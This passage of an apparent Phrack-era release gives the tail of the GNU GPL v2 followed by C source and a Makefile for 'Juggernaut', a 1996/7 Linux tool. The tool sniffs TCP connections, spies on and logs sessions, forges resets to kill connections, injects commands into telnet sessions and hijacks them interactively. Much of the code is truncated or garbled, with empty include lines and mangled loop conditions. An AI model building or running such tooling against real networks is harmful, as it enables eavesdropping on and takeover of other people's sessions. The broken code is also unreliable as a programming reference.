Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
�
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
�
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
�
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
�
Appendix: How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
Copyright (C) 19yy
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) 19yy name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Library General
Public License instead of this License.
<-->
<++> Juggernaut/Install
Juggernaut 1.0 Installation Instructions
----------------------------------------
1. Are you a fucking moron? If so, goto step 6; you are done.
2. Edit the Makefile. You may wish to change a few of the
defines:
USENAME: Define this to have Juggernaut attempt to
resolve IP addresses into FQDNs... It's
slower but more verbose this way.
MULTI_P: Define this to use multi-process model of
multi-tasking.
THREAD: Define this to use multi-threaded model of
multi-tasking. Be sure to also link in
the pthreads library. Not implemented yet.
IP_HDRINCL: Define this if you want/need to use the
IP_HDRINCL socket option to build IP
headers.
NOHUSH: If defined, Juggernaut will notify the user
audibly when a connection is added.
GREED: If defined, Juggernaut will attempt to add
any and ALL TCP based connections to the
database. This is not recommended unless
you know what you are doing...
FASTCHECK: Define this to use a fast x86 assembler
implementation of the IP checksum routine.
May not work on all systems. That's why
you have the option.
3. make all
4. yay.
5. ./juggernaut -h
<-->
<++> Juggernaut/Makefile
# Juggernaut Makefile
# 1996/7 daemon9[guild|phrack|r00t]
CC = gcc
#LIBS = -L/usr/lib -lpthread
CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 #-Wall
DEFINES = -DMULTI_P -DNOHUSH -DUSENAME -DFASTCHECK
DEFINES += #-DGREED #-DIP_HDRINCL #-DTHREAD
OBJECTS = NumberOneCrush/main.o NumberOneCrush/menu.o\
NumberOneCrush/mem.o NumberOneCrush/prometheus.o\
NumberOneCrush/net.o NumberOneCrush/surplus.o
.c.o:
$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
all: JUGGERNAUT
JUGGERNAUT: $(OBJECTS)
$(CC) $(CFLAGS) $(DEFINES) $(OBJECTS) $(LIBS) -o juggernaut
strip juggernaut
clean:
rm -f core juggernaut juggernaut.log.snif juggernaut.log.spy
rm -rf NumberOneCrush/*.o
<-->
<++> Juggernaut/NumberOneCrush/main.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* main.c - main control logic and program driver. Consists mainly of wrappers
* to setup the main subfunctions.
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef THREAD
#include
#endif
#define MINIBUF 10
#define BUFSIZE 512
#define DEVICE "eth0"
#define LOGFILE "./juggernaut.log.spy"
char version[]="1.0\0";
int sigsentry=1; /* Signal sentry */
int ripsock=0; /* RIP socket */
int linksock=0; /* SOCK PACKET socket */
int hpid=0; /* hunter child PID */
int acrstpid=0; /* automated connection reset PID */
int netreadtimeout=10; /* Network read timeout in seconds */
int verbosity=1; /* Level of verbosity */
int enticementfactor=16; /* Enticing packets!@ */
time_t uptime=0; /* How long have we been running */
struct connectionInfo{ /* Simple tuple information */
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
};
/*
* Main control logic. All the main logic is implemented in the switch
* statement.
*/
int main(argc,argv)
int argc;
char *argv[];
{
void usage(char *);
void hunt();
void spy();
void rst();
void arst();
void pkta();
void simplexhijack();
void hijack();
void powerup();
void minit();
void mwipe();
void mmain();
void twitch();
void cleanexit();
void bloodhound(char *,int);
void bookworm();
void dbmanip();
void jinfo();
int rawsock();
int tap();
float dump();
char buf[MINIBUF]={0};
char token[2*MINIBUF]={0};
int c;
if(geteuid()||getuid()){ /* r00t? */
fprintf(stderr,"UID or EUID of 0 needed...\n");
exit(0);
}
/* Parse command-line arguments */
while((c=getopt(argc,argv,"s:e:t:vVhH"))!=-1){
switch(c){
case 's': /* dedicated sniffing mode */
strncpy(token,optarg,(sizeof(token)-1));
break;
case 'e': /* Enticement factor (only valid
with -s option) */
enticementfactor=atoi(optarg);
break;
case 't': /* Network alarm timeout */
netreadtimeout=atoi(optarg);
break;
case 'v': /* decrease verbosity */
verbosity=0;
break;
case 'V': /* version info */
jinfo();
exit(0);
case 'h': /* Help is on the way my friend */
usage(argv[0]);
exit(0);
case 'H': /* Help is on the way my friend */
bookworm();
exit(0);
default:
usage(argv[0]);
break;
}
}
if(token[0]){
bloodhound(token,enticementfactor);
exit(0);
}
mwipe();
minit(); /* Initial menu */
fprintf(stderr,"[cr]");
getchar();
signal(SIGINT,twitch); /* Catch these signals */
signal(SIGQUIT,twitch);
ripsock=rawsock(); /* Setup RIP socket */
linksock=tap(DEVICE); /* Setup link socket */
powerup(); /* Setup shared memory and
semaphore */
time(&uptime); /* Start the uptime timer */
hunt(); /* Start the connection hunter */
while(1){
mwipe();
mmain();
bzero(&buf,sizeof(buf));
fgets(buf,sizeof(buf),stdin);
switch(buf[0]){
case '?':
mwipe();
bookworm();
mwipe();
break;
case '0':
mwipe();
jinfo();
mwipe();
break;
case '1':
mwipe();
dbmanip();
mwipe();
break;
case '2': /* Watch a connection. */
mwipe();
spy();
mwipe();
break;
case '3': /* Kill a connection. */
mwipe();
rst();
mwipe();
break;
case '4': /* Automated CRST daemon. */
mwipe();
arst();
mwipe();
break;
case '5': /* Insert a single command. */
mwipe();
simplexhijack();
mwipe();
break;
case '6': /* Hijack the session from the client */
mwipe();
hijack();
mwipe();
break;
case '7': /* The packet assembly workshop */
mwipe();
pkta();
mwipe();
break;
case '8': /* For future use. */
break;
case '9':
cleanexit();
default:
continue;
}
}
/* NOT REACHED */
return(0);
}
/*
* chunt wrapper
*/
void hunt(){
#ifdef MULTI_P
void spasm(); /* Handles the user defined signal */
void chunt();
switch((hpid=fork())){
case 0: /* Child */
signal(SIGUSR1,spasm);
signal(SIGINT,SIG_IGN); /* Catch these signals */
signal(SIGQUIT,SIG_IGN);
close(ripsock); /* Not needed in hunter */
chunt();
default:
break; /* Parent continues */
case -1:
if(verbosity)perror("(hunt) internal forking error [fatal]");
exit(1);
}
#endif
#ifdef THREAD
MULTIPLE THREADS OF EXECUTION IS NOT IMPLEMENTED YET.
void chunt();
pthread_t hunter_t;
pthread_create(&hunter_t,NULL,(void *)chunt(),(void *)NULL);
#endif
}
/*
* cspy wrapper
*/
void spy(){
void convulsion();
float dump();
struct connectionInfo *checkc(int);
void cspy(struct connectionInfo *,FILE *);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
FILE *fp=0;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >");
fgets(buf,sizeof(buf),stdin);
if(toupper(buf[0])=='Y'){
if(!(fp=fopen(LOGFILE,"a+"))){
if(verbosity){
fprintf(stderr,"Cannot open file for logging, skipping operation.\n");
fprintf(stderr,"[cr]");
getchar();
}
}
}
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when done.\n");
signal(SIGINT,convulsion);
sigsentry=1;
cspy(target,fp);
if(fp)fclose(fp);
}
/*
* crst wrapper
*/
void rst(){
void convulsion();
float dump();
void crst(struct connectionInfo *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
signal(SIGINT,convulsion);
crst(target);
fprintf(stderr,"[cr]");
getchar();
}
/*
* acrst wrapper
*/
void arst(){
void convulsion();
float dump();
void acrst(unsigned long,unsigned long);
char *hostLookup(unsigned long);
unsigned long nameResolve(char *);
char buf[4*MINIBUF];
unsigned long source,target;
/* Setup addresing info */
fprintf(stderr,"\nEnter source IP [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(source=nameResolve(buf))){
if(verbosity){
fprintf(stderr,"Name lookup failure: `%s`\n[cr]",buf);
getchar();
}
return;
}
fprintf(stderr,"\nEnter target IP (optional) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q')return;
if(buf[0]==0x0a)target=0; /* target may be null, in this
case, we only care where
the connection is coming from */
else if(!(target=nameResolve(buf))){
if(verbosity){
fprintf(stderr,"Name lookup failure: %s\n[cr]",buf);
getchar();
}
return;
}
if(!target)fprintf(stderr,"Reseting all connection requests from:\t %s\n",hostLookup(source));
else fprintf(stderr,"Reseting all connection requests from:\t %s --> %s\n",hostLookup(source),hostLookup(target));
fprintf(stderr,"[cr]");
getchar();
acrst(source,target);
}
/*
* dumpc wrapper
*/
float dump(){
float dumpc();
float usage=0;
fprintf(stderr,"\nCurrent Connection Database:\n");
fprintf(stderr,"-------------------------------------------------\n");
fprintf(stderr,"ref # source target \n\n");
usage=dumpc();
fprintf(stderr,"-------------------------------------------------\n");
return usage;
}
/*
* database manipulation routines go here..
*/
void dbmanip(){
float dump();
void cleardb();
float usage=0;
char buf[MINIBUF];
usage=dump();
if(usage)fprintf(stderr,"\nDatabase is %.02f%% to capacity.",usage);
else fprintf(stderr,"\nDatabase is empty.");
fprintf(stderr,"\n[c,q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){
fprintf(stderr,"\nClear entire connection database? [y/N] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='y'){
cleardb();
fprintf(stderr,"\nConnection database cleared.\n[cr]");
getchar();
}
}
}
/*
* Juggernaut version and option information
*/
void jinfo(){
time_t current=0;
fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version);
fprintf(stderr,"\nJuggernaut compiled with the following options:\n");
#ifdef MULTI_P
fprintf(stderr," Multi-processing\n");
#endif
#ifdef NOHUSH
fprintf(stderr," Audible notification\n");
#endif
#ifdef USENAME
fprintf(stderr," Use hostnames\n");
#endif
#ifdef GREED
fprintf(stderr," Greedy connections\n");
#endif
#ifdef FASTCHECK
fprintf(stderr," Fast IP checksuming\n");
#endif
#ifdef IP_HDRINCL
fprintf(stderr," IP header include\n");
#endif
#ifdef THREAD
fprintf(stderr," Multi-threading\n");
#endif
time(¤t);
fprintf(stderr,"Juggernaut has been running %.02f minutes\n",(difftime(current,uptime)/60));
fprintf(stderr,"[cr]");
getchar();
}
/*
* csimplexhijack wrapper
*/
void simplexhijack(){
void sputter();
float dump();
void csimplexhijack(struct connectionInfo *,char *);
void cspy(struct connectionInfo *,FILE *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
char commandbuf[BUFSIZE];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
if(ntohs(target->dport)!=23){
fprintf(stderr,"Hijacking only valid with telnet connections.\n");
fprintf(stderr,"[cr]");
getchar();
return;
}
fprintf(stderr,"Enter the command string you wish executed [q] >");
fgets(commandbuf,sizeof(commandbuf),stdin);
if(commandbuf[0]==0x0a)return;
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
fprintf(stderr,"\nNOTE: This may cause an ACK storm until client is RST.\n");
signal(SIGINT,sputter);
sigsentry=1;
cspy(target,0);
csimplexhijack(target,commandbuf);
fprintf(stderr,"[cr]");
getchar();
}
/*
* chijack wrapper
*/
void hijack(){
void sputter();
float dump();
void chijack(struct connectionInfo *);
void cspy(struct connectionInfo *,FILE *);
struct connectionInfo *checkc(int);
char buf[MINIBUF];
unsigned short val;
struct connectionInfo *target;
dump();
while(1){
fprintf(stderr,"\nChoose a connection [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q')return;
if(!(int)(val=atoi(buf)))continue;
if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
else break;
}
if(ntohs(target->dport)!=23){
fprintf(stderr,"Hijacking only valid with telnet connections.\n");
fprintf(stderr,"[cr]");
getchar();
return;
}
fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n");
fprintf(stderr,"\nNOTE: This will cause an ACK storm and desynch the client until the connection is RST.\n");
signal(SIGINT,sputter);
sigsentry=1;
cspy(target,0);
sigsentry=1;
chijack(target);
fprintf(stderr,"[cr]");
getchar();
}
/*
* Prometheus wrapper (packet assembly workshop)
*/
void pkta(){
void mpkta();
void mwipe();
int prometheus(int);
int val,mode;
char buf[MINIBUF];
while(1){
mwipe();
mpkta();
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* TCP */
mode=1;
break;
case 2: /* UDP */
mode=2;
break;
case 3: /* ICMP */
mode=3;
break;
case 4: /* IP */
mode=4;
break;
case 5: /* Return */
return;
default:
continue;
}
if(prometheus(mode))break;
}
/* NOT REACHED */
}
<-->
<++> Juggernaut/NumberOneCrush/mem.c
/*
*
* Juggernaut
* Version b1
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* mem.c - contains shared memory and semaphore control logic
*
* Multi-process:
* Initializing and accesing shared memory:
* ----------------------------------------
* - Create the shared segment
* - Attach each process to the segment (in our case, the hunter child
* process will inherit a pointer to the block)
* - Grab a semaphore
* - Lock the semaphore; Manipulate shared segment; unlock the semaphore
*
*
* Multi-threaded:
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SHMKEY 242 /* Shared memory key */
#define SEMKEY 424 /* Semaphore key */
#define PERMS 0666 /* Shared Memory Permissions */
#define MAXNODES 512 /* Maximum number of nodes */
#define ADDMSG "+"
#define DELMSG "-"
int semid; /* Semaphore ID */
struct sembuf lock[2]={{0,0,0},{0,1,SEM_UNDO}};
/* wait for sem#0 to become 0 then
increment sem#0 by 1 */
struct sembuf ulock[1]={{0,-1,(IPC_NOWAIT|SEM_UNDO)}};
/* decrement sem#0 by 1 (sets it to 0) */
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
char payload[8192]; /* Data Payload */
}epack;
static struct connectionInfo{ /* Simple tuple structure */
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
}*cinfo=0;
extern int verbosity;
/*
* Creates the shared memory segment then attaches it; then creates a binary
* semaphore to guarantee exclusive access. Clears the structure array.
* Dumps some info.
* Much credit to Richard Stevens and Jeff Thompson.
*/
void powerup(){
void locks();
void ulocks();
void cleardb();
int shmid; /* Shared memory segment id */
int len;
len=sizeof(struct connectionInfo)*MAXNODES;
/* Request a shared memory segment */
if((shmid=shmget(SHMKEY,len,IPC_CREAT))<0){
if(verbosity)perror("(powerup) shared memory segment allocation error [fatal]");
exit(1);
}
/* Get one semaphore to perform shared
memory locking with */
if((semid=semget(SEMKEY,1,IPC_CREAT|PERMS))<0){
if(verbosity)perror("(powerup) semaphore allocation error [fatal]");
exit(1);
}
/* Attach to the shared memory segment */
cinfo=(struct connectionInfo *)shmat(shmid,0,0);
cleardb();
}
/*
* Release the shared memory segment.
*/
void powerdown(){
void locks();
void ulocks();
locks();
shmdt((char *)cinfo); /* Dettach the segment. */
ulocks();
}
/*
* Locks the semaphore so the caller can access the shared memory segment.
* This is an atomic operation.
*/
void locks(){
if(semop(semid,&lock[0],2)<0){
if(verbosity)perror("(locks) could not lock semaphore [fatal]");
exit(1);
}
}
/*
* Unlocks the semaphore so the caller can access the shared memory segment.
* This is an atomic operation.
*/
void ulocks(){
if(semop(semid,&ulock[0],1)<0){
if(verbosity)perror("(ulocks) could not unlock semaphore [fatal]");
exit(1);
}
}
/*
* Add a connection to our list. Linear search of the WHOLE list to see if
* it's already there (which IT SHOULDN'T BE...), if not, add it in the
* first open slot.
*/
char *addc(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
void locks();
void ulocks();
int i=0;
/* A wonderfully inefficient linear
search for duplicates */
locks(); /* Lock shared memory segment */
for(;isaddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
ulocks();
return(0); /* Opps. Found a duplicate */
}
/* Find available slot */
for(i=0;isaddr;
cinfo[i].daddr=iphp->daddr;
cinfo[i].sport=tcphp->source;
cinfo[i].dport=tcphp->dest;
ulocks();
return(ADDMSG);
}
} /* Control falls here if array is
full (which is indicative of
a BUSY NETWORK!@*/
ulocks();
return(0);
}
/*
* Remove a connection from our list. Linear search until we find a
* correspoding entry, or we hit the end of the list.
*/
char *delc(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
void locks();
void ulocks();
int i=0;
locks(); /* Lock shared memory segment */
for(;isaddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){
bzero(&cinfo[i],sizeof(cinfo[i]));
ulocks();
return(DELMSG); /* Inform caller of success */
}
ulocks();
return(0); /* hmm. Wierd. */
}
/*
* Dump the connection list.
*/
float dumpc()
{
void locks();
void ulocks();
char *hostLookup(unsigned long);
int i=0;
float j=0;
locks();
for(;i\t %s [%d]\n",i+1,hostLookup(cinfo[i].saddr),ntohs(cinfo[i].sport),hostLookup(cinfo[i].daddr),ntohs(cinfo[i].dport));
j++;
}
ulocks();
if(!j)return(0);
return(((j/MAXNODES)*100)); /* % utilization */
}
/*
* Check for a connection by index number. Really only here to make sure the
* connection hasn't been deleted since dump() was called.... I think I
* will deprecate this function in future versions...
*/
struct connectionInfo *checkc(target)
int target;
{
void locks();
void ulocks();
static struct connectionInfo tmp;
locks(); /* Lock shared memory segment */
if(cinfo[--target].saddr){
memcpy(&tmp,&cinfo[target],sizeof(tmp));
ulocks();
return(&tmp);
}
ulocks(); /* Nope. Not there */
return((struct connectionInfo *)0);
}
/*
* Clear the connection database
*/
void cleardb(){
void locks();
void ulocks();
int i=0;
locks();
for(;i
<++> Juggernaut/NumberOneCrush/menu.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* menu.c - menu functions.
*
*/
#include
extern char version[];
/*
* Initial Screen
*/
void minit(){
printf("\t\t\t J U G G E R N A U T\n");
printf("\t\t multipurpose network tool for Linux\n");
printf("\t\t\t version: %s\n",version);
printf("\n\n\n\n\n\n");
printf("\t (c) 1996/7 daemon9 | A Guild Corporation Production\t\t\t\n");
printf("\n\n\n\n\n\n");
}
/*
* Main Menu
*/
void mmain(){
printf("\t\t\t Juggernaut\n");
printf("\t\t\t+------------------------------+\n");
printf("\t\t\t?) Help\n");
printf("\t\t\t0) Program information\n");
printf("\t\t\t1) Connection database\n");
printf("\t\t\t2) Spy on a connection\n");
printf("\t\t\t3) Reset a connection\n");
printf("\t\t\t4) Automated connection reset daemon\n");
printf("\t\t\t5) Simplex connection hijack\n");
printf("\t\t\t6) Interactive connection hijack\n");
printf("\t\t\t7) Packet assembly module\n");
printf("\t\t\t8) Souper sekret option number eight\n");
printf("\t\t\t9) Step Down\n");
printf("\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* Packet Assembly Menu [prometheus module]
*/
void mpkta(){
printf("\t\t\t Packet Assembly Module (beta)\n");
printf("\t\t\t+------------------------------+\n");
printf("\t\t\t1. TCP Assembler\n");
printf("\t\t\t2. UDP Assembler\n");
printf("\t\t\t3. ICMP Assembler\n");
printf("\t\t\t4. IP Assembler\n");
printf("\t\t\t5. Return to previous menu\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* TCP assembly options menu
*/
void mpktatcp(packetready,source,destination,seqnum,acknum,control,window,data)
int packetready;
unsigned short source;
unsigned short destination;
unsigned long seqnum;
unsigned long acknum;
char *control;
unsigned short window;
char data[512];
{
printf("\t\t\t TCP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
else printf("\t\t\tSource port: %d\n",source);
if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
else printf("\t\t\tDestination port: %d\n",destination);
if(!(packetready&0x04))printf("\t\t\t3. Sequence Number\n");
else printf("\t\t\tSequence Number: %ld\n",seqnum);
if(!(packetready&0x08))printf("\t\t\t4. Acknowledgement Number\n");
else printf("\t\t\tAcknowledgement Number: %ld\n",acknum);
if(!(packetready&0x10))printf("\t\t\t5. Control Bits\n");
